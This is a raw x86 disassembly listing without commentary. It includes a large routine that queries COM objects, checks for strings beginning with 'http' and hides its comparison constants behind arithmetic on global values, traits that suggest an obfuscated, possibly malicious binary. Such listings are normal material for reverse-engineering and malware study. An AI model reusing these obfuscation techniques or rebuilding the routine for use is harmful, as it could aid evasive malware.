loc_41A47F: ; CODE XREF: sub_41A433+2A�j
; sub_41A433+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41A433 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A48D proc near ; CODE XREF: .data:0041A54E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001098h
push [ebp+arg_0]
call sub_4253DD
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41A48D endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_41A582
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41A4E0: ; CODE XREF: .data:0041A579�j
cmp esi, 0FFFFFFFFh
jz loc_41A591
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41A570
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10013034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10013038h, eax
mov eax, [edx+4]
mov ds:1001303Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10013040h
mov esi, ds:10013038h
rep movsd
lea edi, ds:10013040h
mov ds:10013038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_41A570
js short loc_41A57E
mov edi, [ebx+8]
push ebx
call sub_41A48D
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41A433
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_41A570: ; CODE XREF: .data:0041A4F1�j
; .data:0041A546�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_41A4E0
; ---------------------------------------------------------------------------
loc_41A57E: ; CODE XREF: .data:0041A548�j
xor eax, eax
jmp short loc_41A59B
; ---------------------------------------------------------------------------
loc_41A582: ; CODE XREF: .data:0041A4C5�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41A433
add esp, 0Ch
loc_41A591: ; CODE XREF: .data:0041A4E3�j
push 0Bh
call sub_425425
add esp, 4
loc_41A59B: ; CODE XREF: .data:0041A580�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_41A5B4
call sub_41A5D0
loc_41A5B4: ; CODE XREF: .data:0041A5AD�j
call sub_425368
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10013000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5D0 proc near ; CODE XREF: .data:0041A5AF�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_4253F5
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_4253F5
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_4253F5
mov [ebp+var_C], eax
push 1001301Eh
push [ebp+var_8]
call sub_4253E9
mov ds:10013008h, eax
push 1001301Ch
push [ebp+var_4]
call sub_4253E9
mov ds:10013004h, eax
push 1001301Ch
push [ebp+var_C]
call sub_4253E9
add esp, 30h
mov ds:1001300Ch, eax
mov edi, ds:10013004h
or edi, edi
jz short loc_41A649
push 0
push edi
call sub_425431
add esp, 8
loc_41A649: ; CODE XREF: sub_41A5D0+6C�j
mov edi, ds:1001300Ch
or edi, edi
jz short loc_41A663
push 0
push edi
call sub_425431
add esp, 8
call sub_41A669
loc_41A663: ; CODE XREF: sub_41A5D0+81�j
pop edi
leave
retn
sub_41A5D0 endp
; ---------------------------------------------------------------------------
dw 9090h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A669 proc near ; CODE XREF: sub_41A5D0+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_4253D1
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_41A6A1
; ---------------------------------------------------------------------------
loc_41A685: ; CODE XREF: sub_41A669+3B�j
cmp byte ptr [ebx], 3Dh
jz short loc_41A68D
inc [ebp+var_C]
loc_41A68D: ; CODE XREF: sub_41A669+1F�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_41A6A1: ; CODE XREF: sub_41A669+1A�j
cmp byte ptr [ebx], 0
jnz short loc_41A685
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_425419
pop ecx
mov [ebp+var_8], eax
mov ds:10013010h, eax
cmp [ebp+var_8], 0
jnz short loc_41A6CF
xor eax, eax
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A6CF: ; CODE XREF: sub_41A669+60�j
mov ebx, [ebp+var_10]
jmp short loc_41A719
; ---------------------------------------------------------------------------
loc_41A6D4: ; CODE XREF: sub_41A669+B3�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr [ebx], 3Dh
jz short loc_41A713
push [ebp+var_4]
call sub_425419
pop ecx
mov esi, [ebp+var_8]
mov [esi], eax
or eax, eax
jnz short loc_41A701
jmp short loc_41A72C
; ---------------------------------------------------------------------------
loc_41A701: ; CODE XREF: sub_41A669+94�j
push ebx
mov edi, [ebp+var_8]
push dword ptr [edi]
call sub_42543D
add esp, 8
add [ebp+var_8], 4
loc_41A713: ; CODE XREF: sub_41A669+82�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_41A719: ; CODE XREF: sub_41A669+69�j
cmp byte ptr [ebx], 0
jnz short loc_41A6D4
mov edx, [ebp+var_8]
mov dword ptr [edx], 0
mov eax, 1
loc_41A72C: ; CODE XREF: sub_41A669+64�j
; sub_41A669+96�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A669 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A731 proc near ; CODE XREF: sub_41E6CD+C1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 8000h
movsx eax, word ptr ds:100131F0h
add eax, ds:10013284h
sub eax, 0Ch
push eax
push [ebp+arg_0]
call dword ptr ds:10011634h
pop ebp
retn
sub_41A731 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A755 proc near ; CODE XREF: sub_41D354+1A4�p
; sub_41D354+259�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
movsx eax, word ptr ds:100131FCh
add eax, ds:10013108h
sub eax, 0Bh
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_41A893
; ---------------------------------------------------------------------------
loc_41A789: ; CODE XREF: sub_41A755+146�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, ds:100133B8h[edx]
mov eax, ds:10013090h
movsx edx, word ptr ds:100130E0h
add eax, edx
sub eax, 3
neg eax
cmp esi, eax
jz loc_41A892
mov eax, [ebp+var_8]
or eax, eax
jl loc_41A88F
cmp eax, 3
jg loc_41A88F
jmp dword ptr ds:100137B8h[eax*4]
; ---------------------------------------------------------------------------
dd 0E9F845FFh, 0BBh, 8BF4558Bh, 131580Dh, 0A80D0310h, 83100130h
dd 0D0890DE9h, 4589E0D3h, 83F289E8h, 0D8B30E2h, 10013278h
dd 7005BF0Fh, 1100131h, 0D3D089C1h, 0E8558BF8h, 5588C209h
dd 43D889F3h, 88F3558Ah, 0F845FF10h, 558B75EBh, 0FE283F4h
dd 0A40DBF0Fh, 83100131h, 0D08903E9h, 4589E0D3h, 83F289E4h
dd 0D8B3CE2h, 10013134h, 8906E983h, 8BF8D3D0h, 0C209E455h
dd 89F35588h, 558A43D8h, 0FF1088F3h, 37EBF845h, 83F4558Bh
dd 0BF0F03E2h, 132080Dh, 0D0894110h, 0C289E0D3h, 5588F209h
dd 43D889F3h, 88F3558Ah, 5BF0F10h, 10013144h, 0DC15BF0Fh
dd 1100131h, 7E883D0h
db 89h, 45h, 0F8h
; ---------------------------------------------------------------------------
loc_41A88F: ; CODE XREF: sub_41A755+61�j
; sub_41A755+6A�j
mov [ebp+var_C], esi
loc_41A892: ; CODE XREF: sub_41A755+56�j
inc edi
loc_41A893: ; CODE XREF: sub_41A755+2F�j
cmp byte ptr [edi], 0
jz short loc_41A8A1
cmp ebx, [ebp+var_4]
jb loc_41A789
loc_41A8A1: ; CODE XREF: sub_41A755+141�j
cmp byte ptr [edi], 0
jnz short loc_41A8AD
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_41A8BD
; ---------------------------------------------------------------------------
loc_41A8AD: ; CODE XREF: sub_41A755+14F�j
mov eax, ds:100130E4h
add eax, ds:10013090h
sub eax, 0Bh
neg eax
loc_41A8BD: ; CODE XREF: sub_41A755+156�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A755 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A8C2 proc near ; CODE XREF: sub_41A999+68A�p
; sub_41B7BE+EF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41A8D7: ; CODE XREF: sub_41A8C2+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41A8D7
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_41A8E9: ; CODE XREF: sub_41A8C2+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41A8E9
mov esi, eax
movsx eax, word ptr ds:10013118h
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_41A95A
; ---------------------------------------------------------------------------
loc_41A901: ; CODE XREF: sub_41A8C2+9E�j
mov eax, ds:10013184h
movsx edx, word ptr ds:10013100h
mov ebx, eax
add ebx, edx
sub ebx, 5
mov eax, ds:100131C8h
mov edi, eax
add edi, ds:1001313Ch
sub edi, 3
jmp short loc_41A953
; ---------------------------------------------------------------------------
loc_41A926: ; CODE XREF: sub_41A8C2+93�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_41A957
inc ebx
cmp ebx, esi
jnz short loc_41A952
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_41A952
mov eax, [ebp+var_4]
jmp short loc_41A967
; ---------------------------------------------------------------------------
loc_41A952: ; CODE XREF: sub_41A8C2+7E�j
; sub_41A8C2+89�j
inc edi
loc_41A953: ; CODE XREF: sub_41A8C2+62�j
cmp edi, esi
jb short loc_41A926
loc_41A957: ; CODE XREF: sub_41A8C2+79�j
inc [ebp+var_4]
loc_41A95A: ; CODE XREF: sub_41A8C2+3D�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_41A901
mov eax, 0FFFFh
loc_41A967: ; CODE XREF: sub_41A8C2+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A8C2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_41A96F: ; CODE XREF: .data:0041A993�j
call sub_41E480
mov eax, ds:1001318Ch
add eax, 2
mov edx, ds:10013280h
add edx, 0EA5Ch
imul eax, edx
push eax
call dword ptr ds:10012630h
pop ecx
jmp short loc_41A96F
; ---------------------------------------------------------------------------
db 5Dh, 0C2h, 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A999 proc near ; CODE XREF: .data:0042331E�p
var_71F10 = dword ptr -71F10h
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF9 = byte ptr -70EF9h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50E9D = byte ptr -50E9Dh
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_425379
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call dword ptr ds:1000D038h
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
movsx eax, word ptr ds:1001316Ch
movsx edx, word ptr ds:10013180h
add eax, edx
sub eax, 5
push eax
push [ebp+arg_0]
call dword ptr ds:10010254h
mov ebx, eax
movsx eax, word ptr ds:100130C0h
movsx edx, word ptr ds:100131B4h
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_41B762
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push 10014AD8h
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:1001326Ch
sub eax, 9
cmp ebx, eax
jnz loc_41B762
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, ds:10013224h
sub eax, 5
cmp ebx, eax
jnz loc_41B756
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_41E841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call dword ptr ds:10012BA0h
cmp [ebp+var_40E57], 68h
jnz short loc_41AAB4
cmp [ebp+var_40E56], 74h
jnz short loc_41AAB4
cmp [ebp+var_40E55], 74h
jnz short loc_41AAB4
cmp [ebp+var_40E54], 70h
jz short loc_41AAB9
loc_41AAB4: ; CODE XREF: sub_41A999+FE�j
; sub_41A999+107�j ...
jmp loc_41B756
; ---------------------------------------------------------------------------
loc_41AAB9: ; CODE XREF: sub_41A999+119�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, ds:10013204h
add eax, ds:100130DCh
sub eax, 4
cmp ebx, eax
jz short loc_41AAEA
and [ebp+var_30E4C], 0
loc_41AAEA: ; CODE XREF: sub_41A999+148�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, ds:1001328Ch
add eax, ds:10013274h
sub eax, 7
cmp ebx, eax
jnz loc_41B756
lea eax, [ebp+var_40E6C]
push eax
push 10014A58h
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013268h
sub eax, 4
cmp ebx, eax
jnz loc_41B74A
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
mov eax, ds:10013204h
dec eax
cmp ebx, eax
jnz loc_41B73E
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word ptr ds:10013170h
sub eax, 2
cmp ebx, eax
jnz loc_41B732
mov eax, ds:10013128h
sub eax, 8
neg eax
mov [ebp+var_40E5C], eax
push 100149A0h
call sub_421B74
push eax
call dword ptr ds:1000D044h
mov [ebp+var_30E44], eax
push 10014990h
call sub_421B74
add esp, 8
push eax
call dword ptr ds:1000D044h
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_425399
loc_41ABE1: ; CODE XREF: sub_41A999+D6D�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
mov eax, ds:10013194h
sub eax, 8
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_41AC4C
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:100131D0h
add eax, ds:10013284h
sub eax, 10h
cmp ebx, eax
jnz loc_41B6F4
push 10014981h
call sub_41E914
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000D020h
add esp, 0Ch
jmp loc_41AD54
; ---------------------------------------------------------------------------
loc_41AC4C: ; CODE XREF: sub_41A999+266�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push 10014AA8h
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100131E8h
dec eax
cmp ebx, eax
jnz loc_41B6F4
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
mov eax, ds:100130B4h
sub eax, 8
cmp ebx, eax
jz short loc_41ACE1
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_41B6F4
; ---------------------------------------------------------------------------
loc_41ACE1: ; CODE XREF: sub_41A999+335�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, ds:1001321Ch
sub eax, 8
cmp ebx, eax
jz short loc_41AD1F
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_41B6F4
; ---------------------------------------------------------------------------
loc_41AD1F: ; CODE XREF: sub_41A999+367�j
push 10014972h
call sub_41E914
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
add esp, 18h
loc_41AD54: ; CODE XREF: sub_41A999+2AE�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:10013268h
sub eax, 4
cmp ebx, eax
jnz loc_41B6F4
movsx eax, word ptr ds:10013240h
movsx edx, word ptr ds:100130CCh
add eax, edx
sub eax, 9
mov [ebp+var_30E50], eax
jmp loc_41B6E2
; ---------------------------------------------------------------------------
loc_41AD97: ; CODE XREF: sub_41A999+D55�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word ptr ds:100130C0h
mov edx, ds:1001314Ch
sub edx, 6
mov [ebp+eax+var_50E9D], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word ptr ds:10013180h
sub eax, 4
cmp ebx, eax
jnz loc_41B6DC
push 10014964h
call sub_41E914
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000D020h
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push 10014A78h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013224h
sub eax, 5
cmp ebx, eax
jnz loc_41B361
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
cmp ebx, ds:10013138h
jnz loc_41B355
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_41E841
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call dword ptr ds:10012BA0h
movsx eax, word ptr ds:10013230h
sub eax, 6
mov [ebp+var_40E9C], eax
jmp short loc_41AF24
; ---------------------------------------------------------------------------
loc_41AED8: ; CODE XREF: sub_41A999+597�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word ptr ds:10013104h
add edx, 5
cmp eax, edx
jz short loc_41AF02
movsx edx, word ptr ds:10013130h
add edx, 7
cmp eax, edx
jnz short loc_41AF1E
loc_41AF02: ; CODE XREF: sub_41A999+559�j
mov eax, [ebp+var_40E9C]
mov edx, ds:1001325Ch
add edx, ds:100131D8h
sub edx, 11h
mov [ebp+eax+var_60E9F], dl
loc_41AF1E: ; CODE XREF: sub_41A999+567�j
inc [ebp+var_40E9C]
loc_41AF24: ; CODE XREF: sub_41A999+53D�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_41AED8
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_425399
mov eax, ds:10013148h
sub eax, 2
mov [ebp+var_40E9C], eax
loc_41AF53: ; CODE XREF: sub_41A999+70D�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_41AF63: ; CODE XREF: sub_41A999+5CF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41AF63
mov [ebp+var_60EA8], eax
mov edx, ds:10013184h
add edx, ds:10013188h
sub edx, 2
cmp eax, edx
jz short loc_41AF9B
movsx edx, word ptr ds:10013130h
mov ecx, ds:1001313Ch
lea edx, [edx+ecx+0C2h]
cmp eax, edx
jbe short loc_41AFA0
loc_41AF9B: ; CODE XREF: sub_41A999+5E8�j
jmp loc_41B079
; ---------------------------------------------------------------------------
loc_41AFA0: ; CODE XREF: sub_41A999+600�j
mov eax, ds:100131B0h
sub eax, 7
mov [ebp+var_60EA4], eax
jmp short loc_41AFE0
; ---------------------------------------------------------------------------
loc_41AFB0: ; CODE XREF: sub_41A999+653�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
mov edx, ds:1001313Ch
add edx, 17h
movsx ecx, word ptr ds:10013144h
add edx, ecx
cmp eax, edx
jnz short loc_41AFEE
inc [ebp+var_60EA4]
loc_41AFE0: ; CODE XREF: sub_41A999+615�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_41AFB0
loc_41AFEE: ; CODE XREF: sub_41A999+63F�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_41B079
mov eax, ds:100131A8h
movsx edx, word ptr ds:10013218h
add eax, edx
sub eax, 6
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_41A8C2
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, ds:10013154h
add eax, 0FFF8h
cmp [ebp+var_60EDC], eax
jnz short loc_41B079
push 1001495Fh
call sub_41E914
push eax
lea edi, [ebp+var_50E9B]
push edi
call dword ptr ds:1000D020h
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call dword ptr ds:1000D020h
add esp, 14h
loc_41B079: ; CODE XREF: sub_41A999:loc_41AF9B�j
; sub_41A999+661�j ...
mov eax, [ebp+var_60EA8]
movsx edx, word ptr ds:100131E0h
movsx ecx, word ptr ds:100131C0h
add edx, ecx
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_41AF53
mov eax, ds:1001328Ch
sub eax, 6
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_41B0C3: ; CODE XREF: sub_41A999+72F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41B0C3
mov [ebp+var_60EA8], eax
mov eax, ds:100130ACh
add eax, ds:100130F4h
sub eax, 8
mov [ebp+var_40E9C], eax
jmp loc_41B327
; ---------------------------------------------------------------------------
loc_41B0E9: ; CODE XREF: sub_41A999+99A�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:10013254h
add edx, 17h
add edx, ds:10013168h
cmp eax, edx
jz short loc_41B111
and [ebp+var_60EAC], 0
loc_41B111: ; CODE XREF: sub_41A999+76F�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:100131C4h
add edx, 13h
movsx ecx, word ptr ds:10013150h
add edx, ecx
cmp eax, edx
jnz loc_41B2D3
movsx eax, word ptr ds:10013230h
movsx edx, word ptr ds:10013124h
add eax, edx
sub eax, 0Ch
cmp [ebp+var_40E9C], eax
jbe loc_41B209
mov eax, [ebp+var_40E9C]
mov edx, ds:100131B8h
add edx, ds:1001325Ch
sub edx, 0Ch
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, ds:100131A0h
add edx, 1Dh
cmp eax, edx
jle short loc_41B1A5
movsx edx, word ptr ds:10013240h
mov ecx, ds:10013224h
lea edx, [edx+ecx+29h]
cmp eax, edx
jl short loc_41B1FF
loc_41B1A5: ; CODE XREF: sub_41A999+7F5�j
movzx eax, [ebp+var_60EDD]
mov edx, ds:10013164h
add edx, 35h
add edx, ds:10013168h
cmp eax, edx
jle short loc_41B1CD
movsx edx, word ptr ds:10013260h
add edx, 3Fh
cmp eax, edx
jl short loc_41B1FF
loc_41B1CD: ; CODE XREF: sub_41A999+824�j
movzx eax, [ebp+var_60EDD]
movsx edx, word ptr ds:100131A4h
mov ecx, ds:100131E4h
lea edx, [edx+ecx+6Fh]
cmp eax, edx
jle short loc_41B209
mov edx, ds:10013138h
add edx, 76h
